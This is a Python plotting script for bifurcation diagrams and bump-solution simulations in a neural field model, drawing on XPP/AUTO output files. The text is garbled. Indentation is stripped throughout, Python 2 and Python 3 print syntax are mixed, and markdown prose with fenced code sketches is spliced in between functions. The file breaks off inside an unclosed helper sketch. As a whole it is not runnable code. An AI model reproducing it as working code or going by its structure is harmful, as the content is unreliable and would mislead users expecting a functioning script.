# nullcline intersections (from XPP)
r1 = 0.59458
nu1 = 0.69031
r2 = 1.4227
nu2 = 0.33135
#r1 = .41087
#nu1 = .70345
#r2 = 1.5752
#nu2 = .25322
ax2.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
ax2.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
ax2.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1, nu1-.025), xycoords='data',
xytext=(-40, -80), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=10"),
)
ax2.annotate(r'$r='+str(1.4928)+r'$ \\ $\nu='+str(0.4808)+'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-130,armB=15,rad=7"),
)
ax2.set_xlim(0,2)
ax2.set_ylim(0,.8)
###### ## PART 3
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=2.44_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=2.44_y_mesh=100.dat")
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
ax3 = fig.add_subplot(133)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
ax3.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
ax3.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
ax3.set_xlabel(r'$r$')
#ax3.set_ylabel(r'$\nu$')
ax3.set_title(r'$g=2.44$')
ax3.set_yticklabels([])
# nullcline intersections (from XPP)
r1 = .41087
nu1 = .70345
r2 = 1.5752
nu2 = .25322
#ax3.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
#ax3.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
"""
ax2.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1, nu1-.05), xycoords='data',
xytext=(-30, -50), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=10"),
)
ax2.annotate(r'$r='+str(1.4928)+r'$ \\ $\nu='+str(0.4808)+'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=7"),
)
"""
ax3.set_xlim(0,2)
ax3.set_ylim(0,1)
return fig
def oned_phase_auto(choice='q1'):
"""
1d bifurcation diagram of reduced system from auto
see 1d.ode
"""
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(121)
if choice == 'q1':
filelist = ["bif_q1_gvary1.dat","bif_q1_gvary2a.dat","bif_q1_gvary2b.dat","bif_q1_gvary2c.dat"]
elif choice == 'q0.5':
filelist = ["bif_q0.5_gvary1.dat","bif_q0.5_gvary2a.dat","bif_q0.5_gvary2b.dat","bif_q0.5_gvary_travel.dat"]#,"bif_q0.5_gvary2c.dat"]
branchidx = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
stabe = False
ustabe = False
stabp = False
ustabp = False
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
label = None
if t == 1:
lw=3;color='red'
marker = None
if branchidx == 0 and not(stabe):
label='Stable Equilibrium'
ls = '-'
stabe = True
else:
label=None
elif t == 2:
lw=1;color='black'
marker = None
if branchidx == 0 and not(ustabe):
label='Unstable Equilibrium'
ls = '-'
ustabe = True
else:
label=None
elif t == 3:
lw=3;color='green'
#marker = 'o'
marker = None
if branchidx == 0 and not(stabp):
label='Stable Periodic'
ls='-'
stabp = True
else:
label=None
elif t == 4:
lw=1;color='blue'
#marker = 'o'
marker = None
if branchidx == 0 and not(ustabp):
label='Unstable Periodic'
ls='-'
ustabp = True
else:
label=None
#print b,t
alpha = 1
me = 5
if filename == "bif_q0.5_gvary_travel.dat":
ls = '--'
else:
ls = '-'
if filename == "bif_q1_gvary1.dat" or \
filename == "bif_q0.5_gvary1.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2b.dat":
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
if filename == "bif_q1_gvary1.dat" or \
filename == "bif_q0.5_gvary1.dat":
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
"""
if filename == "bif_q1_gvary2a.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2c.dat":
label = None
alpha = 0.5
else:
alpha = 1.
"""
if filename == "bif_q0.5_gvary_travel.dat":
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],-(clean(dat[:,0],dat[:,1])[1]-2*pi-pi)+pi,
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]-2*pi,
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
else:
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
print branchidx, label
branchidx += 1
if choice == 'q0.5':
ax.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
ax.annotate("HB",color='orange',
xy=(1.5,0), xycoords='data',
xytext=(1.2, 1.2), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
ax.annotate("LP 2",color='purple',
xy=(2.65599, 11.8292-2*pi), xycoords='data',
xytext=(2.3, 2*pi-.3), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
ax.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
# unstable equilib
ax.plot([0,5],[pi,pi],color='black')
ax.plot([0,5],[-pi,-pi],color='black')
# mark bistability
ax.plot([2.20126,2.20126],[-10,10],color='black',ls=':')
ax.plot([2.34017,2.34017],[-10,10],color='black',ls=':')
# labels
ax.set_xlabel(r'$\bm{g}$',size=15)
ax.set_ylabel(r'$\bm{\theta}$',size=15)
# set y axis ticks to multiples of pi
ax.set_ylim(-pi-.1,2*pi+.1)
ax.set_xlim(0,5)
ax.set_yticks(np.arange(-1,2+1.,1.)*pi)
#y_label = [r"$-3\pi$", r"$-2\pi$",
# r"$-\pi$", r"$0$",
# r"$\pi$",r"$2\pi$",r"$3\pi$"]
y_label = [r"$-\pi$", r"$0$",
r"$\pi$", r"$2\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_yticklabels(y_label)
ax.legend(loc='lower left',fontsize=10)
"""
2 param bifurcation diagram from auto
"""
#fig = plt.figure(figsize=(7.5,7.5))
#fig = plt.figure()
ax2 = fig.add_subplot(122)
namelist = ['BP','HB','LP 2','LP 1']
colorlist = ['teal','orange','purple','black']
filelist = ["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['-', '--', '-.', ':']
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax2.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
ax2.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax2.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax2.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
ax2.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax2.legend(loc='upper left',fontsize=10)
ax2.set_xlabel(r'$\bm{g}$',size=15)
ax2.set_ylabel(r'$\bm{q}$',size=15)
ax2.set_xlim(1,5)
return fig
def draw_branches(ax,filelist,smallscale=False):
branchidx = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
#print branchlist
# first branch
stabe = False
ustabe = False
stabp = False
ustabp = False
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
#print typelist
for t in typelist:
print 'branch',b,'type',t
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
label = None
if t == 1:
lw=3;color='red'
marker = None
if branchidx == 0 and not(stabe):
label='Stable Equilibrium'
ls = '-'
stabe = True
else:
label=None
elif t == 2:
lw=1;color='black'
marker = None
if branchidx == 0 and not(ustabe):
label='Unstable Equilibrium'
ls = '-'
ustabe = True
else:
label=None
elif t == 3:
lw=3;color='green'
#marker = 'o'
marker = None
if branchidx == 0 and not(stabp):
label='Stable Periodic'
ls='-'
stabp = True
else:
label=None
elif t == 4:
lw=1;color='blue'
#marker = 'o'
marker = None
if branchidx == 0 and not(ustabp):
label='Unstable Periodic'
ls='-'
ustabp = True
else:
label=None
#print b,t
alpha = 1
me = 5
if (filename == 'bif_full_q0.5_gvary2c.dat') or\
(filename == "bif_full_q0.5_gvary_travel.dat") or\
(filename == "bif_full_a2_q0.5_gvary2.dat") or\
(filename == "bif_full_a3_q0.5_gvary2.dat"):
ls='--'
else:
ls='-'
if filename == "bif_full_q1_gvary1.dat" or \
filename == "bif_full_q0.5_gvary1.dat" or \
filename == "bif_full_q0.5_gvary2a.dat" or \
filename == "bif_full_q0.5_gvary2b.dat":
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
elif filename == "bif_full_q1_gvary1.dat" or \
filename == "bif_full_q0.5_gvary1.dat" or \
filename == "bif_full_q0.5_gvary2c.dat":
#print 'gvary_2c',filename
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
"""
if filename == "bif_q1_gvary2a.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2c.dat":
label = None
alpha = 0.5
else:
alpha = 1.
"""
if filename == "bif_full_q0.5_gvary_travel.dat" or\
filename == "bif_full_q0.5_gvary2c.dat":
label = None
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],-(clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]-2*pi-pi)+pi,
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]-2*pi,
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
else:
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1],
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1],
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
branchidx += 1
return ax
def draw_branches_twop(ax,filelist,namelist,colorlist,ls):
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
return ax
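The branch/type bookkeeping in the two helpers above (and in `oned_phase_auto`) groups AUTO output rows by the branch id in the second-to-last column and the stability type in the third-to-last column; `b_idx*t_idx` is an elementwise AND of the two boolean masks. A self-contained sketch with synthetic data in the same column layout (the helper name `split_branches` is illustrative, not from this module):

```python
import numpy as np

def split_branches(bif):
    """Group rows of an AUTO-style array by (branch id, stability type).

    Assumes the layout used above: column -2 holds the branch id and
    column -3 the point type (1=stable eq., 2=unstable eq., ...).
    """
    out = {}
    for b in np.unique(bif[:, -2]):
        b_idx = bif[:, -2] == b
        for t in np.unique(bif[b_idx, -3]):
            t_idx = bif[:, -3] == t
            out[(b, t)] = bif[b_idx & t_idx, :]  # elementwise AND, same as b_idx*t_idx
    return out
```

Each `(branch, type)` group can then be plotted with its own line width, color, and style, exactly as the loops above do.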
def oned_phase_2par(subplots=1,with_numerics=True):
"""
1d domain, 2par bifurcation diagram of reduced system from auto
see 1d.ode
"""
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax1 = plt.subplot(gs[:2,:2])
"""
2 param bifurcation diagram from auto
"""
namelist = ['BP','HB','LP 2','LP 1']
colorlist = ['teal','orange','purple','black']
filelist = ["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['-', '--', '-.', ':']
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax1.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax1.fill_between() # disabled: missing required x, y1 arguments
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
ax1.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax1.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
ax1.text(3.5,1.6,'3. Bistability',rotation=27,size=15)
ax1.text(3.1,.3,'4. Traveling Bump',rotation=0,size=15)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
dat = oned_simple.SimDat(g=0.,q=0.,zshift=0,T=1000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(a)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = int(dat.t[-1]/dat.dt)
pad = 10
start_idx = 100
print start_idx
#edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = 500#edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+500
print end_idx
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.5, .7), xycoords='axes fraction', xytext=(1.2, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#
#########################################################################################
if subplots >= 3:
ax13 = plt.subplot(gs[2,-1])
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(c)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = int(dat.t[-1]/dat.dt)
pad = 10
start_idx = int(np.argmin(np.mod(dat.ph_angle[total_time_idx//2:]+pi,2*pi)-pi) + total_time_idx//2 + pad//2)
print(start_idx)
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = int(edge_travel_time/dat.dt) - pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print('shifted oned const vel analytic by 578 with dt=%s' % dat.dt)
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.2, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
"""
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
"""
ax23 = plt.subplot(gs[1,-1])
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax23.set_xlabel(r'$x$')
ax23.set_title(r"\textbf{(b)}",x=0.1)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)//2
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax23.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax23.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax23.plot(modsolph[slc],timearr[slc],ls='--',lw=2,dashes=(5,2),color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax23.set_aspect('auto')
ax23.set_xlim(-pi,pi)
ax23.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax23.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax23.set_xticklabels(x_label)
ax1.annotate('', xy=(.9, .55), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
ax1.annotate('', xy=(.9, .42), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = 3700#-550
ax32 = plt.subplot(gs[-1,-2])
dat = oned_simple.SimDat(g=3.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax32.set_xlabel(r'$x$')
ax32.set_title(r"\textbf{(d)}",x=0.1)
start_idx = len(dat.t)//2
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax32.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax32.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax32.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax32.set_aspect('auto')
ax32.set_xlim(-pi,pi)
ax32.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax32.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax32.set_xticklabels(x_label)
ax1.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 5:
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = -950
ax31 = plt.subplot(gs[-1,-3])
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax31.set_xlabel(r'$x$')
ax31.set_title(r"\textbf{(e)}",x=0.1)
start_idx = len(dat.t)//2
end_idx = int(1.3*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax31.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax31.xaxis.tick_bottom()
ax31.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax31.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax31.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax31.set_aspect('auto')
ax31.set_xlim(-pi,pi)
ax31.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax31.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax31.set_xticklabels(x_label)
ax1.annotate('', xy=(.3, .05), xycoords='axes fraction', xytext=(.05, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax1.legend(loc='upper left',fontsize=10)
ax1.set_xlabel(r'$\bm{g}$',size=15)
ax1.set_ylabel(r'$\bm{q}$',size=15)
ax1.set_xlim(1,5)
return fig
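The overlays above rely on `unlink_wrap` (defined elsewhere in this module) to split a wrapped phase trace into contiguous segments so matplotlib does not draw vertical lines across the ±π jumps. A minimal sketch of such a helper, assuming a jump threshold of π (the real implementation may differ):

```python
import numpy as np

def unlink_wrap_sketch(angles, thresh=np.pi):
    # Yield slices of contiguous data, splitting wherever consecutive
    # samples jump by more than `thresh` (i.e. a wrap from +pi to -pi).
    jumps = np.where(np.abs(np.diff(angles)) > thresh)[0]
    start = 0
    for j in jumps:
        yield slice(start, j + 1)
        start = j + 1
    yield slice(start, len(angles))

# A phase that wraps twice: three monotone segments
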